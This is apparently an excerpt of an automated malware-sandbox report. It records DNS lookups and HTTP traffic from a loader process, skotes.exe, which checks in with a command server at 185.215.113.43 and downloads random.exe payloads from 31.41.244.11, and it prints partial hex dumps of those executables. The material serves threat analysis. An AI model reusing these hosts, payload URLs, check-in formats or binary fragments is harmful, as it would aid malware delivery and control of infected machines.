                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.247721910 CET1.1.1.1192.168.2.50xf021No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.248414993 CET1.1.1.1192.168.2.50xaf65No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.248414993 CET1.1.1.1192.168.2.50xaf65No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.456907988 CET1.1.1.1192.168.2.50x41aaNo error (0)assets.msn.cnassets.msn.cn.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.456907988 CET1.1.1.1192.168.2.50x41aaNo error (0)assets.msn.cn.edgekey.net.globalredir.akadns88.nete19240.d.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.703931093 CET1.1.1.1192.168.2.50xc5b3No error (0)assets.msn.cnassets.msn.cn.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:28.703931093 CET1.1.1.1192.168.2.50xc5b3No error (0)assets.msn.cn.edgekey.net.globalredir.akadns88.nete19240.d.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:29.531793118 CET1.1.1.1192.168.2.50xb564No error (0)staticview.msn.comstaticview.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:29.544631004 CET1.1.1.1192.168.2.50x4d8eNo error (0)staticview.msn.comstaticview.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:30.281025887 CET1.1.1.1192.168.2.50x2385No error (0)fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:31.337042093 CET1.1.1.1192.168.2.50xbed0No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:31.344774961 CET1.1.1.1192.168.2.50x9fb5No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:31.344774961 CET1.1.1.1192.168.2.50x9fb5No error (0)googlehosted.l.googleusercontent.com172.217.17.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:33.136122942 CET1.1.1.1192.168.2.50xd8aaNo error (0)fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:36.769512892 CET1.1.1.1192.168.2.50xe7dbNo error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:36.770848036 CET1.1.1.1192.168.2.50xd269No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:41.698643923 CET1.1.1.1192.168.2.50x63b9No error (0)fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:44.629482985 CET1.1.1.1192.168.2.50x9202No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:49.516042948 CET1.1.1.1192.168.2.50xd824Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:49.714293003 CET1.1.1.1192.168.2.50x1b33Name error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:05.307061911 CET1.1.1.1192.168.2.50x53faName error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:05.457659006 CET1.1.1.1192.168.2.50x9c9dName error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:07.666635990 CET1.1.1.1192.168.2.50x94f4No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:07.667263031 CET1.1.1.1192.168.2.50x5cc6No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:41.382206917 CET1.1.1.1192.168.2.50x8f9Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:41.539124012 CET1.1.1.1192.168.2.50x730eName error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          0192.168.2.549814185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:05.069822073 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:06.475291967 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:06 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          1192.168.2.549823185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:08.120657921 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 156
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:09.486785889 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:09 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 35 36 33 0d 0a 20 3c 63 3e 31 30 31 38 39 36 37 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 39 36 61 38 30 35 31 34 35 62 30 30 32 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 31 30 31 38 39 36 38 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 31 37 37 39 62 34 36 34 64 61 63 35 38 65 62 30 33 35 36 34 64 35 62 39 63 64 33 65 39 35 36 62 37 62 35 64 31 23 31 30 31 38 39 36 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 65 30 36 64 39 64 34 61 34 33 62 61 34 61 65 38 31 63 31 36 30 33 34 37 39 39 64 32 65 30 31 37 62 66 65 33 64 31 34 38 32 62 23 31 30 31 38 39 37 30 30 30 31 2b 2b 2b 62 35 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: 563 <c>1018967001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#1018968001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbd1779b464dac58eb03564d5b9cd3e956b7b5d1#1018969001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbe06d9d4a43ba4ae81c16034799d2e017bfe3d1482b#1018970001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1018971001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc67e805545b01cf64d4a485a9592e100b7#1018972001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc770934541bf5dab5e45425197d1aa1daaa8#1018973001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbdc76914a49ba1cf64d4a485a9592e100b7#1018974001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc07e804d03ac52ea484b411b9dc4e1#1018975001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#1018976001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1 [TRUNCATED]
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:09.486848116 CET334INData Raw: 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 38 39 37 38 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63
                                                                                                                                                                                                                                                                          Data Ascii: 74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1018978001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1018979001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1018980


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          2192.168.2.54982831.41.244.11802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:09.611090899 CET62OUTGET /files/burpin1/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947586060 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:10 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 4438776
                                                                                                                                                                                                                                                                          Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "675784f0-43baf8"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947678089 CET224INData Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1
                                                                                                                                                                                                                                                                          Data Ascii: jZQ39FY~9F~fAfG@;F|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A|At>E;Ew6rE;Es,j*P*YYtlAj@ AEPjh5XAA3
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947712898 CET1236INData Raw: c9 c2 0c 00 8b 44 24 08 85 c0 74 0c a3 6c e9 41 00 b8 05 40 00 80 eb 3a 56 8b 74 24 08 57 8d 7e 24 83 3f 00 74 0f 8b 4e 20 8d 46 34 50 83 c1 08 e8 c0 11 01 00 8b cf e8 da 29 01 00 83 7e 1c 00 74 0c ff 76 40 ff 76 28 ff 15 80 a1 41 00 5f 33 c0 5e
                                                                                                                                                                                                                                                                          Data Ascii: D$tlA@:Vt$W~$?tN F4P)~tv@v(A_3^UVuA}juuv(j}iuv(jjuVP^]=AtjA=XAtL$AVQ3=lAQjjPR=Atj5XAA^L$
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947765112 CET1236INData Raw: 8b 76 0c 85 f6 59 74 06 8b 06 56 ff 50 08 5e c3 83 6c 24 04 04 e9 76 ff ff ff 56 6a 01 8b f1 e8 d3 fc ff ff 8b 46 04 8b 0e 66 8b 54 24 08 66 89 14 41 ff 46 04 8b 46 04 8b 0e 66 83 24 41 00 8b c6 5e c2 04 00 55 8b ec ff 75 0c 8b 4d 08 e8 03 fc ff
                                                                                                                                                                                                                                                                          Data Ascii: vYtVP^l$vVjFfT$fAFFf$A^UuMuME]Vt$NFuhVrzY3^Uh$AuYYtEMPQ3hAu{YYu@]L$IAujP3VNXAD
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947799921 CET1236INData Raw: 8d 55 d4 0f 95 c0 52 6a 0c ff 75 0c 89 46 3c 8b 46 0c 8b 08 50 ff 51 18 3b c7 89 45 0c 74 19 8d 4d d4 e8 fe 08 01 00 ff 75 f0 e8 ec 75 01 00 8b 7d 0c 59 e9 cf fe ff ff 0f b7 45 d4 3b c7 74 1a 83 f8 40 74 07 6a 66 e9 71 ff ff ff 8b 45 dc 89 46 34
                                                                                                                                                                                                                                                                          Data Ascii: URjuF<FPQ;EtMuu}YE;t@tjfqEF4EF8EPAF4PEPA9~<t3Y>jh/N4QPYY%jlu;YtxXAH3PMF (F jQHxx,
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947834015 CET672INData Raw: 64 a1 41 00 eb 7a 83 3d 90 e9 41 00 00 75 6f 8b 35 68 a1 41 00 68 d0 a5 41 00 bb c4 a5 41 00 53 c7 05 90 e9 41 00 01 00 00 00 ff d6 8b 3d 6c a1 41 00 50 ff d7 6a 00 89 45 fc 0f b7 05 80 e9 41 00 68 09 04 00 00 6a 00 50 8d 45 bc 68 a8 a5 41 00 50
                                                                                                                                                                                                                                                                          Data Ascii: dAz=Auo5hAhAASA=lAPjEAhjPEhAPA}uhASPEtjEPjU3_^[U,SVW3WAjXPE0A}j`X5TAj`jdPv|=j[j=j[j_EPju@AWSuW
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947886944 CET1236INData Raw: 50 ff 51 0c 39 75 fc 74 3f ff 75 fc e8 d4 fd ff ff 59 8d 4d d8 51 6a 18 50 89 45 fc ff 15 40 a0 41 00 6a 06 ff 75 e0 ff 75 dc 56 56 56 ff 75 08 ff 15 84 a2 41 00 ff 75 fc 56 68 72 01 00 00 ff 75 08 ff 15 b8 a2 41 00 8b 45 f0 8b 08 50 ff 51 08 33
                                                                                                                                                                                                                                                                          Data Ascii: PQ9ut?uYMQjPE@AjuuVVVuAuVhruAEPQ3@WPA3_^[f=AuD<AfAAfft@Af=uDAA;ufAAUSV339AtAM9tFA9u9
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947938919 CET1236INData Raw: 5b c2 04 00 8b 01 8b 51 04 8b 4c 24 08 2b d1 8d 54 12 02 8d 0c 48 52 51 8b 4c 24 0c 8d 04 48 50 ff 15 3c a2 41 00 83 c4 0c c2 08 00 53 56 57 eb 3b 8b 02 8b 39 8a 1c 07 8a c3 e8 db f5 ff ff 84 c0 75 27 80 fb 3b 75 2d 3b fe 7d 12 8b 01 8b 32 80 3c
                                                                                                                                                                                                                                                                          Data Ascii: [QL$+THRQL$HP<ASVW;9u';u-;}2<0t@;B|2_^[Ar91|S\$VWu33|$Gt$P$AtF;w|3_^[t3GVt$W39~~(Ft$P$AujWPOG;~
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.947973013 CET1236INData Raw: 37 00 89 75 f4 e8 ec fd ff ff 57 e8 ef 64 01 00 59 5f 8b 45 08 5e 5b c9 c2 0c 00 53 56 8b 74 24 0c 57 8b f9 8b 47 04 39 06 7e 02 89 06 8b 5c 24 14 53 e8 d0 e6 ff ff 8b 06 50 03 c3 50 8b cf e8 ec fa ff ff 5f 5e 5b c2 08 00 8b 44 24 08 ff 30 8b 44
                                                                                                                                                                                                                                                                          Data Ascii: 7uWdY_E^[SVt$WG9~\$SPP_^[D$0D$0YY@W|$D$xt.SVpFPVPVSjt$,8Af$A^G[_USVuE39Xt2WxS?ESAPQNPWuSuA
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:10.948049068 CET1236INData Raw: 4d f4 e8 72 f8 ff ff f6 85 a4 fd ff ff 10 8b 7d f4 74 35 68 88 a6 41 00 8d 85 d0 fd ff ff 50 ff 15 24 a1 41 00 85 c0 74 33 68 80 a6 41 00 8d 85 d0 fd ff ff 50 ff 15 24 a1 41 00 85 c0 74 1d 57 e8 58 ff ff ff 59 eb 10 6a 00 57 ff d6 85 c0 74 4b 57
                                                                                                                                                                                                                                                                          Data Ascii: Mr}t5hAP$At3hAP$AtWXYjWtKWAt@PSAqSAjutuAtW_3@W_3Y_^[=lAt3@Vt$VAu3@^ujVAtVA^3^VY^
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.067568064 CET1236INData Raw: 8d 4d a4 e8 d0 dd ff ff 8d 4d b0 e8 c8 dd ff ff 8b 4d fc 8b 07 89 4d f8 8d 34 08 8d 4d d4 e8 e3 f3 ff ff 8a 0e 33 db eb 14 80 f9 3d 74 1d ff 75 f4 8d 4d d4 e8 d5 f4 ff ff 43 8a 0c 1e 8a c1 88 4d f4 e8 57 e7 ff ff 84 c0 74 de 68 e9 fd 00 00 8d 45
                                                                                                                                                                                                                                                                          Data Ascii: MMMM4M3=tuMCMWthEPEP^PMuZuZYY ]M M<=EMu<"t<-uulYFYuE0AFe


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          3192.168.2.549852185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:20.549946070 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 38 39 36 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                          Data Ascii: d1=1018967001&unit=246122658369
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:21.883877039 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:21 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          4192.168.2.54985831.41.244.11802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:22.007539034 CET63OUTGET /files/zhigarko/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.328876972 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:23 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 863093
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 20 Dec 2024 20:00:38 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "6765cce6-d2b75"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 c4 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 70 10 00 00 04 00 00 82 9d 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8@p@@R$`.textrt `.rdatan+,x@@.data+@.ndata.rsrcRT@@.reloc`@B
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.328912973 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d
                                                                                                                                                                                                                                                                          Data Ascii: U\}t+}FEuHGHPuuu@KSV5GWEPu@eEEPu@}eD@FRVVU+MMEFQNUMMVTU
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.328929901 CET448INData Raw: 55 8b ec 81 ec 10 02 00 00 53 56 57 8d 45 fc 50 a1 90 eb 47 00 83 c8 08 50 33 db 53 ff 75 0c ff 75 08 ff 15 04 90 40 00 3b c3 75 69 8b 35 00 90 40 00 bf 05 01 00 00 eb 19 39 5d 10 75 4b 53 8d 85 f0 fd ff ff 50 ff 75 fc e8 b2 ff ff ff 85 c0 75 12
                                                                                                                                                                                                                                                                          Data Ascii: USVWEPGP3Suu@;ui5@9]uKSPuuWPSutu@jN;t$S5Guuu@3@_^[9Guuu@uU@@Vt5dGEPGEPjj"PV@
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329047918 CET1236INData Raw: 40 00 e8 6b 4c 00 00 59 59 53 56 e8 30 fd ff ff e9 7c 1a 00 00 53 e8 e4 fd ff ff 50 68 60 9f 40 00 e8 4c 4c 00 00 59 59 53 ff 75 d4 e8 10 39 00 00 e9 50 1a 00 00 33 c9 e8 ac fd ff ff 8b f0 56 68 4c 9f 40 00 e8 28 4c 00 00 59 59 83 fe 01 7f 03 33
                                                                                                                                                                                                                                                                          Data Ascii: @kLYYSV0|SPh`@LLYYSu9P3VhL@(LYY3FV@&h0@LYu@@9]u%`G G3ASM`G G`Gu4`G3;#MD4`GjG5D@;t
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329063892 CET1236INData Raw: 68 f0 00 41 00 e8 91 41 00 00 83 e8 04 75 10 68 70 9b 40 00 e8 85 47 00 00 59 e9 36 ff ff ff 48 74 40 68 40 9b 40 00 e8 72 47 00 00 59 56 6a fa e9 c7 fa ff ff ff 75 cc 6a e2 e8 2e 34 00 00 83 7d 08 02 75 07 c7 45 fc 01 00 00 00 ff 75 08 56 68 f0
                                                                                                                                                                                                                                                                          Data Ascii: hAAuhp@GY6Ht@h@@rGYVjuj.4}uEuVh@DGPh@2GhGYCuj3GSSuuGVWh@F}u}tEPSPu`@u@;ujVLuV2DjV
